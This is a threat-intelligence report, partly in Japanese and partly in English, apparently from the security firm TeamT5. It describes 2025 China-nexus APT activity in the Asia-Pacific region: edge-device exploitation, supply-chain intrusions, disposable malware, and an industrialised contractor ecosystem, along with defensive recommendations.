APACにおけるAPT脅威動向 2025：侵入活動の産業化

APAC地域全体で地政学的緊張が高まり続ける中、この地域におけるAPT活動は、件数と高度化の両面で激化しています。2025年、TeamT5は世界67か国に影響を及ぼす510件以上のAPTオペレーションを追跡しており、この数は2024年から着実に増加しています。そのうち173件の攻撃は台湾を標的としており、他の地域ターゲットと比べても突出した活動レベルとなっています。

長年にわたる観測から、台湾はサイバー作戦において最も継続的かつ集中的に標的とされている環境であり、観測される活動の大半は中国によるものであることが分かっています。

台湾は地政学的に重要な位置にあり、世界のテクノロジーサプライチェーンでも大きな価値を持つため、政治的・軍事的目的を背景に情報収集や長期的な侵入を狙う攻撃者にとって、特に標的となりやすい状況にあります。こうした攻撃キャンペーンは規模や多様性も大きく、長期間にわたって継続していることから、台湾は単なる最前線の標的にとどまらず、中国系攻撃者の侵入手法がどのように進化していくのかを示す「早期警戒の指標」としても位置付けられています。

実際に台湾で観測される攻撃キャンペーンでは、新たなツールや進化するTTP（戦術・技法・手順）がいち早く採用されるケースが多く見られます。そのため、台湾は単なる標的にとどまらず、中国系（China-nexus）APTが戦術を試し、磨き上げた上で他地域へ展開する前の実証の場として機能しています。

As defenders continue to harden endpoints with capabilities like EDR, threat actors are adapting by shifting operations to layers with comparatively limited telemetry and weaker detection coverage. That shift is reflected in our 2025 findings: we tracked 27 critical vulnerabilities, most of which impacted edge devices such as firewalls, routers, and VPN appliances. Moreover, China-nexus actors have paired exploitation with custom backdoors tailored to specific device families. These backdoors are often designed to persist even after the underlying vulnerability is patched or the device is rebooted. This transforms one-time perimeter access into long-term access across victim networks and significantly raises the difficulty of detection and complete eradication. In addition, Internet of Things (IoT) devices are increasingly being abused by threat actors for a range of malicious objectives, particularly as low-noise infrastructure that blends into normal network traffic. For example, we observed actors chaining compromised IoT devices into operational relay box (ORB) networks to stage and route attacks, effectively obscuring the origin of malicious activity. In other cases, actors have abused Network Attached Storage (NAS) systems as reverse SSH tunnel relays, facilitating data exfiltration through an intermediary that often appears benign.

Supply chain attacks accelerated further in 2025, reinforcing what TeamT5 describes as “Fail-of-Trust Model”. In a supply chain attack, threat actors compromise software vendors, managed service providers, or cloud service providers to exploit inherited trust and pivot into their downstream customer environments. In Taiwan, TeamT5 observed multiple attacks in which Chinese actors (e.g., Huapi and SLIME86) first compromised upstream IT service providers, then leveraged that access to move laterally into government, military, and critical infrastructure networks. In other notable cases attributed to China-nexus SocialNetworkTeam and SLIME40 (aka Salt Typhoon), threat actors compromised national telecom networks and used that access for long-term traffic interception and surveillance, including DNS manipulation and ISP-level hijacking. These campaigns directly erode the foundational assumptions of the digital ecosystem: that “trusted” suppliers are secure. By weaponizing trusted relationships as attack paths, supply chain operations turn implicit trust into a liability, hence the “Fail-of-Trust Model.” Consistent with this shift, we observed a clear uptick in 2025 attacks aimed at the IT sector. Threat actors are increasingly treating IT providers as strategic infrastructure, using them as launchpads to reach downstream targets more efficiently and at far greater scale.

Malware deployment tradecraft also evolved in 2025. Across the 300+ malicious samples we tracked, we saw a clear rise in customized, disposable “one-time” malware. Much of it consisted of lightweight loaders and downloaders which are quick to build, easy to tailor to a specific intrusion chain, and inherently more capable of evading signature-based detection. In parallel, we increasingly observed multi-tool intrusion stacks, where actors deploy more than one malware family and/or a mix of malware and legitimate hacking tools within the same operation. This reduces single points of failure: if one component is detected or blocked, others can maintain access, pivot laterally, or re-establish command-and-control. For defenders, the result is a broader, more fragmented footprint that slows triage and makes complete eradication harder.

The observed increase in volume and sophistication of APT operations occurs in parallel with increasing signs of a maturing APT ecosystem in China. Over the years, China has been cultivating its offensive cyber capabilities through a “whole-of-nation” model: In this model, the state retains strategic direction (e.g., prioritizing intelligence requirements and target sets) while execution capacity is expanded through a market of contractors, brokers, and specialist vendors. Public attributions and industry reporting over the last few years increasingly describe a threat landscape where the boundary between “state” and “private sector” is operationally blurred, producing an industrial-scale pipeline for intrusions. The Chinese APT ecosystem blends state direction with “hacking-as-a-service” dynamics: capability is packaged, priced, and delivered in units that can be purchased, tasked, or repurposed. The 2024 I-Soon leak has shown how a private Chinese company conducted intrusions and monetized access and how such kind of contractor capacity can be integrated into state-aligned operations.

In 2025, more evidence surfaced—via indictments, sanctions packages, and leaked materials—that Chinese private-sector vendors are not merely tooling suppliers but can play operational roles across intrusion activity. Taken together, these disclosures point to an ecosystem that is becoming more modular and specialized as it scales. That industrialization is most visible in the shift from a traditional “one APT group runs the full kill chain” assumption to a service-layered model. Instead of one team doing everything end-to-end, different providers can contribute capabilities at distinct stages. Examples map cleanly onto this cyber supply chain: At the front end are large-scale reconnaissance providers conducting internet-wide scanning and target profiling; Midstream are developers producing exploits, modular malware components, and tailored one-time payloads, optimized for specific environments; At the back end are infrastructure operators who specialize in command-and-control, proxy layers, and operational relay box (ORB) networks. This division of labor enables faster iteration, higher operational tempo, and greater resiliency.

For governments, enterprises, and critical sectors worldwide, the lesson is clear: indicator-driven defense can’t keep up with an industrialized intrusion ecosystem that can quickly change tools, servers, and routes when exposed. Defenders therefore have to move upstream to proactive, hypothesis-driven threat hunting that prioritizes durable behaviors over short-lived signatures. This approach shifts the objective from “blocking known bad” to finding active tradecraft early, before the adversary completes collection and exfiltration.

But hunting alone is not enough, because this is an ecosystem problem. Effective defense also requires deep regional intelligence that explains how the ecosystem is organized. That context turns scattered telemetry into actionable understanding, enabling defenders to distinguish who is responsible for reconnaissance, initial access, payload delivery, and infrastructure enablement. With those roles mapped, defenders can better anticipate likely next moves in the kill chain and apply disruption at the points of greatest leverage.

TeamT5 believes meaningful impact depends on international collaboration grounded in shared adversary insight. In other words, defenders must compete with an industrial system by responding as a coordinated system. TeamT5 is committed to doing our part: contributing high-quality cyber threat intelligence, supporting joint response efforts, and strengthening the partnerships that make collective defense work.

TeamT5は、APAC地域に特化した脅威インテリジェンスの専門企業です。台湾という独自の地政学的視点、多言語対応力、そして20年以上にわたる研究実績を活かし、アジア太平洋地域におけるAPTおよびランサムウェアの脅威を専門としています。政府機関、金融機関、テクノロジー分野を対象に、高度にローカライズされた実践的な脅威インテリジェンスと防御ソリューションを提供しています。 私たちは、効果的なサイバーセキュリティは、脅威を継続的に追跡し、深く理解することから始まると考えています。研究を中核に据えるTeamT5は、組織が防御に活用できる実践的な脅威インテリジェンスとして提供することで組織がリスクを先読みし、受動的な対応から能動的な防御へと移行できるよう支援することで、サイバーリスクの低減を実現します。

インテリジェンス主導のサイバー防御を実践する組織として、TeamT5は新たに出現する脅威を継続的に監視し、攻撃の傾向を分析、早期に対応することで、被害の拡大を防いでいます。また、信頼と協調を重視し、世界有数のサイバーセキュリティカンファレンスや国際フォーラムにおいて研究成果を積極的に共有しています。グローバルなセキュリティコミュニティ、そしてお客様やパートナーと緊密に連携することで、脅威インテリジェンスの実践的活用を推進し、組織全体のサイバー・レジリエンス強化に貢献しています。